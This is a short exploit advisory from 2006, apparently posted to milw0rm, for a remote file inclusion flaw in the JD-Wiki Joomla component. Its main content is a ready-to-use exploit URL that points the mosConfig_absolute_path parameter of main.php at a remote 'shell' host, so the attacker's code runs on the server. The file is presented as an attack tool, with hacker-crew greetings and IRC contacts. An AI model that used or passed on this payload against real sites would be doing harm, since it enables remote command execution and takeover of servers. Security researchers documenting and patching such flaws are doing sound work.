21 lines
776 B
Text
Executable file
21 lines
776 B
Text
Executable file
####################################################################################
|
|
#JD-Wiki Remote File Include
|
|
------------------------------------------------------------------------------------
|
|
JD-Wiki is the Joomla! integration of the nice DokuWiki.
|
|
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating
|
|
documentation of any kind.
|
|
------------------------------------------------------------------------------------
|
|
#Bug Found by: jank0
|
|
#greetz: hackbsd crew
|
|
#risk: dangerous
|
|
##this bug allows a remote atacker to execute commands via rfi
|
|
|
|
path: ?mosConfig_absolute_path=
|
|
|
|
xpl:
|
|
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
|
|
|
|
|
|
Contact: irc.undernet.org #hackbsd & #ircmasters
|
|
|
|
# milw0rm.com [2006-08-07]
|